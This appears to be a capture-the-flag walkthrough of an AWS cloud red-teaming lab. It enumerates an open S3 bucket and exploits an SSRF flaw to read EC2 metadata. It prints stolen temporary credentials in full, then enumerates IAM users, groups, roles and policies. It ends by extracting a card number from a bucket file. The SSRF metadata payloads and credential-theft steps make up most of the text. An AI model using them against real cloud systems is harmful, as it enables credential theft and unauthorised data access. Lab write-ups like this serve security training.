Skip to content

AWS Cloud Red Teaming done

1. Full URL of the s3 bucket belongs to “cwl-metatech” organization?

Tool: cloud_enum
https://github.com/initstring/cloud_enum
---
┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ python cloud_enum.py -k cwl-metatech --disable-azure --disable-gcp

##########################
        cloud_enum
   github.com/initstring
##########################


Keywords:    cwl-metatech
Mutations:   /tmp/cloud_enum/enum_tools/fuzz.txt
Brute-list:  /tmp/cloud_enum/enum_tools/fuzz.txt

[+] Mutations list imported: 306 items
[+] Mutated results: 1837 items

++++++++++++++++++++++++++
      amazon checks
++++++++++++++++++++++++++

[+] Checking for S3 buckets
  OPEN S3 BUCKET: http://cwl-metatech.s3.amazonaws.com/
      FILES:
      ->http://cwl-metatech.s3.amazonaws.com/cwl-metatech
      ->http://cwl-metatech.s3.amazonaws.com/dev-server-ip.txt
      ->http://cwl-metatech.s3.amazonaws.com/prod-data.txt
      ->http://cwl-metatech.s3.amazonaws.com/staging-data.txt

 Elapsed time: 00:01:48

[+] Checking for AWS Apps
[*] Brute-forcing a list of 1837 possible DNS names

 Elapsed time: 00:00:30


[+] All done, happy hacking!

Answer

http://cwl-metatech.s3.amazonaws.com

2. Web app running on “dev-server” ec2 instance, what is name of the parameter which is vulnerable to SSRF?

Open the website: http://18.216.126.203/update.html (IP address from here --> http://cwl-metatech.s3.amazonaws.com/dev-server-ip.txt)
___
┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ curl -s http://cwl-metatech.s3.amazonaws.com/dev-server-ip.txt       
18.216.126.203  
---
Find SSRF vuln in IP parametr

Answer

ip

3. Name of role attached to the dev ec2 instance?

Read metadata

payload: http://169.254.169.254/latest/meta-data/iam/security-credentials

Answer

ec2-role

4. Name of the user who is part of the “interns” group.

1 Get credentials

Payload: http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-role
__

{ "Code" : "Success", "LastUpdated" : "2025-01-14T11:50:54Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIAUI7PQBNF46UQBZQV", "SecretAccessKey" : "HPa+Y1v5EaiXQ7/odbCbQIzh7la7qjHgbS/nWvJo", "Token" : "IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMiJHMEUCIQCyX32D7mbxeX9ULh1svR0q1h8m8/972J0olI/ejI1PNAIgd7jjeEH6t+oN7N+SfMbI2FkD5XSRKQL4pymTjLOBiIEquQUIFRACGgwyOTQxNzA2NTk2NTkiDFv2z0+kUKSCshvy3CqWBaFqQc1EVpVowoKBzRYkuo05U4kLI+uQGVwTjMt976WpxSrLC97QqSLkYRkMrp/a3KaZ18TfEJB7ewiHnpIxstH3dINGBuN7i5GXQcxc4cGf2vvnBrqgPpms8/ft3HkG2ulshzFsaqubzcVjcdL+pyn2s4JT/f1BmKpeqdip+U7JJE6ZlMoYqHa8WZ90flHBnTacQ3M5+yXzhLmK00acd5Syg1W/IFNe/frV51ye7XE7m9U+ds5tb9Fh508JdfzA97mFU0uRtwf5n9nu/5OKpmyLQpisd6rW9UgVz2sOL+aTwdIH+YYwycd2zPK+XsEeAX/jaUregxAmmFOfZRUAxr6m4PwVoanB0hQYtpWYdQ7NpvZWLytet1fH2bYNhwLioAwiMy88tdSYNig2slMJT2eRhgC7q5/Bob3apJJq+HLDzrw05tL9vc7ebscoZS0AE2aa2a0CXl1JbahBenncPWvUoXnFJC00uwkj7uGrnJR0UeerTQEF2IhoNgZjhOrO5MsLqVmeEVPzjHVxHiXbA0KOaXeQMqXpPHZvIKIMtCJxT6igQ1tQF2YCpJzW1s9Y6pTiFZvIccoKhfjvidVDvDvnGg4O69Rjz/a1XyphF5rvkXq9uLrkE+l/aACLW4XZESOvZQQFWb8i6nPEyQyMyUWn5TIkxq8FE73Z90jaFWdP8KsDRIocDNwuPPk7nmfWlcJUTuY6AX9P9QbN6h8B00cT0hxyI4tnLgdmgKAwRTBEa3GYVhXstwZLKDu7vOp8arvOynxZ56MB2NpZcBPv9Jh+0StPJqS+9ltTYb3qrvStaP4O7MWrpkJchyuHY/MNT+xdUt3K3WdSuS2R5LKGvS3y+++ah6IQblynpWzIPOm6BwC4KIFQMLSfmbwGOrEB40k0GxsCEDFOHu7tJ3yOzzNPJLq5Et5n0mG6Eke8WaQmXFZPmPfSYP+X8cfcJWtFffhz7Xci3bAY0LixgVO8hWed/YFIxgIxt5bMyfL3k14oCrLSEBBKMmmEkuYCSvYjFLLV2T69XaRgfyBQ2t9mRn8gs4TFpwjL2wn2DmERJo3KIjhh4NLZ4Z6Bh6UOSTDxDdi/CyxEwF/x+mDBJ/PqDqv0IDzhWR9dFCvSkCGiRUdO", "Expiration" : "2025-01-14T18:13:53Z" }
---
2 Set up creds with command aws configure

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ cat ~/.aws/credentials
[default]
aws_access_key_id = ASIAUI7PQBNF46UQBZQV
aws_secret_access_key = HPa+Y1v5EaiXQ7/odbCbQIzh7la7qjHgbS/nWvJo
aws_token = IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMiJHMEUCIQCyX32D7mbxeX9ULh1svR0q1h8m8/972J0olI/ejI1PNAIgd7jjeEH6t+oN7N+SfMbI2FkD5XSRKQL4pymTjLOBiIEquQUIFRACGgwyOTQxNzA2NTk2NTkiDFv2z0+kUKSCshvy3CqWBaFqQc1EVpVowoKBzRYkuo05U4kLI+uQGVwTjMt976WpxSrLC97QqSLkYRkMrp/a3KaZ18TfEJB7ewiHnpIxstH3dINGBuN7i5GXQcxc4cGf2vvnBrqgPpms8/ft3HkG2ulshzFsaqubzcVjcdL+pyn2s4JT/f1BmKpeqdip+U7JJE6ZlMoYqHa8WZ90flHBnTacQ3M5+yXzhLmK00acd5Syg1W/IFNe/frV51ye7XE7m9U+ds5tb9Fh508JdfzA97mFU0uRtwf5n9nu/5OKpmyLQpisd6rW9UgVz2sOL+aTwdIH+YYwycd2zPK+XsEeAX/jaUregxAmmFOfZRUAxr6m4PwVoanB0hQYtpWYdQ7NpvZWLytet1fH2bYNhwLioAwiMy88tdSYNig2slMJT2eRhgC7q5/Bob3apJJq+HLDzrw05tL9vc7ebscoZS0AE2aa2a0CXl1JbahBenncPWvUoXnFJC00uwkj7uGrnJR0UeerTQEF2IhoNgZjhOrO5MsLqVmeEVPzjHVxHiXbA0KOaXeQMqXpPHZvIKIMtCJxT6igQ1tQF2YCpJzW1s9Y6pTiFZvIccoKhfjvidVDvDvnGg4O69Rjz/a1XyphF5rvkXq9uLrkE+l/aACLW4XZESOvZQQFWb8i6nPEyQyMyUWn5TIkxq8FE73Z90jaFWdP8KsDRIocDNwuPPk7nmfWlcJUTuY6AX9P9QbN6h8B00cT0hxyI4tnLgdmgKAwRTBEa3GYVhXstwZLKDu7vOp8arvOynxZ56MB2NpZcBPv9Jh+0StPJqS+9ltTYb3qrvStaP4O7MWrpkJchyuHY/MNT+xdUt3K3WdSuS2R5LKGvS3y+++ah6IQblynpWzIPOm6BwC4KIFQMLSfmbwGOrEB40k0GxsCEDFOHu7tJ3yOzzNPJLq5Et5n0mG6Eke8WaQmXFZPmPfSYP+X8cfcJWtFffhz7Xci3bAY0LixgVO8hWed/YFIxgIxt5bMyfL3k14oCrLSEBBKMmmEkuYCSvYjFLLV2T69XaRgfyBQ2t9mRn8gs4TFpwjL2wn2DmERJo3KIjhh4NLZ4Z6Bh6UOSTDxDdi/CyxEwF/x+mDBJ/PqDqv0IDzhWR9dFCvSkCGiRUdO
aws_session_token = IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMiJHMEUCIQCyX32D7mbxeX9ULh1svR0q1h8m8/972J0olI/ejI1PNAIgd7jjeEH6t+oN7N+SfMbI2FkD5XSRKQL4pymTjLOBiIEquQUIFRACGgwyOTQxNzA2NTk2NTkiDFv2z0+kUKSCshvy3CqWBaFqQc1EVpVowoKBzRYkuo05U4kLI+uQGVwTjMt976WpxSrLC97QqSLkYRkMrp/a3KaZ18TfEJB7ewiHnpIxstH3dINGBuN7i5GXQcxc4cGf2vvnBrqgPpms8/ft3HkG2ulshzFsaqubzcVjcdL+pyn2s4JT/f1BmKpeqdip+U7JJE6ZlMoYqHa8WZ90flHBnTacQ3M5+yXzhLmK00acd5Syg1W/IFNe/frV51ye7XE7m9U+ds5tb9Fh508JdfzA97mFU0uRtwf5n9nu/5OKpmyLQpisd6rW9UgVz2sOL+aTwdIH+YYwycd2zPK+XsEeAX/jaUregxAmmFOfZRUAxr6m4PwVoanB0hQYtpWYdQ7NpvZWLytet1fH2bYNhwLioAwiMy88tdSYNig2slMJT2eRhgC7q5/Bob3apJJq+HLDzrw05tL9vc7ebscoZS0AE2aa2a0CXl1JbahBenncPWvUoXnFJC00uwkj7uGrnJR0UeerTQEF2IhoNgZjhOrO5MsLqVmeEVPzjHVxHiXbA0KOaXeQMqXpPHZvIKIMtCJxT6igQ1tQF2YCpJzW1s9Y6pTiFZvIccoKhfjvidVDvDvnGg4O69Rjz/a1XyphF5rvkXq9uLrkE+l/aACLW4XZESOvZQQFWb8i6nPEyQyMyUWn5TIkxq8FE73Z90jaFWdP8KsDRIocDNwuPPk7nmfWlcJUTuY6AX9P9QbN6h8B00cT0hxyI4tnLgdmgKAwRTBEa3GYVhXstwZLKDu7vOp8arvOynxZ56MB2NpZcBPv9Jh+0StPJqS+9ltTYb3qrvStaP4O7MWrpkJchyuHY/MNT+xdUt3K3WdSuS2R5LKGvS3y+++ah6IQblynpWzIPOm6BwC4KIFQMLSfmbwGOrEB40k0GxsCEDFOHu7tJ3yOzzNPJLq5Et5n0mG6Eke8WaQmXFZPmPfSYP+X8cfcJWtFffhz7Xci3bAY0LixgVO8hWed/YFIxgIxt5bMyfL3k14oCrLSEBBKMmmEkuYCSvYjFLLV2T69XaRgfyBQ2t9mRn8gs4TFpwjL2wn2DmERJo3KIjhh4NLZ4Z6Bh6UOSTDxDdi/CyxEwF/x+mDBJ/PqDqv0IDzhWR9dFCvSkCGiRUdO
┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ cat ~/.aws/credentials
[default]
aws_access_key_id = ASIAUI7PQBNF46UQBZQV
aws_secret_access_key = HPa+Y1v5EaiXQ7/odbCbQIzh7la7qjHgbS/nWvJo
aws_token = IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMiJHMEUCIQCyX32D7mbxeX9ULh1svR0q1h8m8/972J0olI/ejI1PNAIgd7jjeEH6t+oN7N+SfMbI2FkD5XSRKQL4pymTjLOBiIEquQUIFRACGgwyOTQxNzA2NTk2NTkiDFv2z0+kUKSCshvy3CqWBaFqQc1EVpVowoKBzRYkuo05U4kLI+uQGVwTjMt976WpxSrLC97QqSLkYRkMrp/a3KaZ18TfEJB7ewiHnpIxstH3dINGBuN7i5GXQcxc4cGf2vvnBrqgPpms8/ft3HkG2ulshzFsaqubzcVjcdL+pyn2s4JT/f1BmKpeqdip+U7JJE6ZlMoYqHa8WZ90flHBnTacQ3M5+yXzhLmK00acd5Syg1W/IFNe/frV51ye7XE7m9U+ds5tb9Fh508JdfzA97mFU0uRtwf5n9nu/5OKpmyLQpisd6rW9UgVz2sOL+aTwdIH+YYwycd2zPK+XsEeAX/jaUregxAmmFOfZRUAxr6m4PwVoanB0hQYtpWYdQ7NpvZWLytet1fH2bYNhwLioAwiMy88tdSYNig2slMJT2eRhgC7q5/Bob3apJJq+HLDzrw05tL9vc7ebscoZS0AE2aa2a0CXl1JbahBenncPWvUoXnFJC00uwkj7uGrnJR0UeerTQEF2IhoNgZjhOrO5MsLqVmeEVPzjHVxHiXbA0KOaXeQMqXpPHZvIKIMtCJxT6igQ1tQF2YCpJzW1s9Y6pTiFZvIccoKhfjvidVDvDvnGg4O69Rjz/a1XyphF5rvkXq9uLrkE+l/aACLW4XZESOvZQQFWb8i6nPEyQyMyUWn5TIkxq8FE73Z90jaFWdP8KsDRIocDNwuPPk7nmfWlcJUTuY6AX9P9QbN6h8B00cT0hxyI4tnLgdmgKAwRTBEa3GYVhXstwZLKDu7vOp8arvOynxZ56MB2NpZcBPv9Jh+0StPJqS+9ltTYb3qrvStaP4O7MWrpkJchyuHY/MNT+xdUt3K3WdSuS2R5LKGvS3y+++ah6IQblynpWzIPOm6BwC4KIFQMLSfmbwGOrEB40k0GxsCEDFOHu7tJ3yOzzNPJLq5Et5n0mG6Eke8WaQmXFZPmPfSYP+X8cfcJWtFffhz7Xci3bAY0LixgVO8hWed/YFIxgIxt5bMyfL3k14oCrLSEBBKMmmEkuYCSvYjFLLV2T69XaRgfyBQ2t9mRn8gs4TFpwjL2wn2DmERJo3KIjhh4NLZ4Z6Bh6UOSTDxDdi/CyxEwF/x+mDBJ/PqDqv0IDzhWR9dFCvSkCGiRUdO
aws_session_token = IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMiJHMEUCIQCyX32D7mbxeX9ULh1svR0q1h8m8/972J0olI/ejI1PNAIgd7jjeEH6t+oN7N+SfMbI2FkD5XSRKQL4pymTjLOBiIEquQUIFRACGgwyOTQxNzA2NTk2NTkiDFv2z0+kUKSCshvy3CqWBaFqQc1EVpVowoKBzRYkuo05U4kLI+uQGVwTjMt976WpxSrLC97QqSLkYRkMrp/a3KaZ18TfEJB7ewiHnpIxstH3dINGBuN7i5GXQcxc4cGf2vvnBrqgPpms8/ft3HkG2ulshzFsaqubzcVjcdL+pyn2s4JT/f1BmKpeqdip+U7JJE6ZlMoYqHa8WZ90flHBnTacQ3M5+yXzhLmK00acd5Syg1W/IFNe/frV51ye7XE7m9U+ds5tb9Fh508JdfzA97mFU0uRtwf5n9nu/5OKpmyLQpisd6rW9UgVz2sOL+aTwdIH+YYwycd2zPK+XsEeAX/jaUregxAmmFOfZRUAxr6m4PwVoanB0hQYtpWYdQ7NpvZWLytet1fH2bYNhwLioAwiMy88tdSYNig2slMJT2eRhgC7q5/Bob3apJJq+HLDzrw05tL9vc7ebscoZS0AE2aa2a0CXl1JbahBenncPWvUoXnFJC00uwkj7uGrnJR0UeerTQEF2IhoNgZjhOrO5MsLqVmeEVPzjHVxHiXbA0KOaXeQMqXpPHZvIKIMtCJxT6igQ1tQF2YCpJzW1s9Y6pTiFZvIccoKhfjvidVDvDvnGg4O69Rjz/a1XyphF5rvkXq9uLrkE+l/aACLW4XZESOvZQQFWb8i6nPEyQyMyUWn5TIkxq8FE73Z90jaFWdP8KsDRIocDNwuPPk7nmfWlcJUTuY6AX9P9QbN6h8B00cT0hxyI4tnLgdmgKAwRTBEa3GYVhXstwZLKDu7vOp8arvOynxZ56MB2NpZcBPv9Jh+0StPJqS+9ltTYb3qrvStaP4O7MWrpkJchyuHY/MNT+xdUt3K3WdSuS2R5LKGvS3y+++ah6IQblynpWzIPOm6BwC4KIFQMLSfmbwGOrEB40k0GxsCEDFOHu7tJ3yOzzNPJLq5Et5n0mG6Eke8WaQmXFZPmPfSYP+X8cfcJWtFffhz7Xci3bAY0LixgVO8hWed/YFIxgIxt5bMyfL3k14oCrLSEBBKMmmEkuYCSvYjFLLV2T69XaRgfyBQ2t9mRn8gs4TFpwjL2wn2DmERJo3KIjhh4NLZ4Z6Bh6UOSTDxDdi/CyxEwF/x+mDBJ/PqDqv0IDzhWR9dFCvSkCGiRUdO
---
3 Run command list all user from group inters

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam get-group --group-name interns --query "Users[*].UserName" --output text
int001
┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam get-group --group-name interns --query "Users[*].UserName" --output text
int001

Answer

int001

5. Name of the group with an “emp003” user as a member.

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam list-groups-for-user --user-name emp003 --query "Groups[*].GroupName" --output text
employees

Answer

employees

6. AWS Account ID which can assume “crossaccount-role”?

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam get-role --role-name crossaccount-role --query "Role.AssumeRolePolicyDocument.Statement[*].Principal.AWS" --output text
arn:aws:iam::999909936336:user/DevOps

Answer

999909936336

7. Name of aws role which can be assumed by “devops-role”?

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam list-roles | grep "RoleName.*dev.*"
            "RoleName": "dev-ec2-role-ch1",
            "RoleName": "dev-role",
            "RoleName": "devops-role",

Answer

dev-role

8. Name of Inline policy embed to “emp001” user.

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam list-user-policies --user-name emp001 --output text
POLICYNAMES     s3-administrator-Policy

Answer

s3-administrator-Policy

9. ARN of policy attached to “employees” group?

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam list-attached-group-policies --group-name employees --query "AttachedPolicies[*].PolicyArn" --output text 
arn:aws:iam::aws:policy/AmazonDevOpsGuruFullAccess

Answer

arn:aws:iam::aws:policy/AmazonDevOpsGuruFullAccess

10. The credit card number of “Bob” is in the “prod-data.txt” file stored in the s3 bucket.

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ curl -s http://cwl-metatech.s3.amazonaws.com/prod-data.txt | grep Bob
Bob         Cabal1         6271701225979642     03/2026

Answer

6271701225979642

References

[cloud_enum]( https://github.com/initstring/cloud_enum)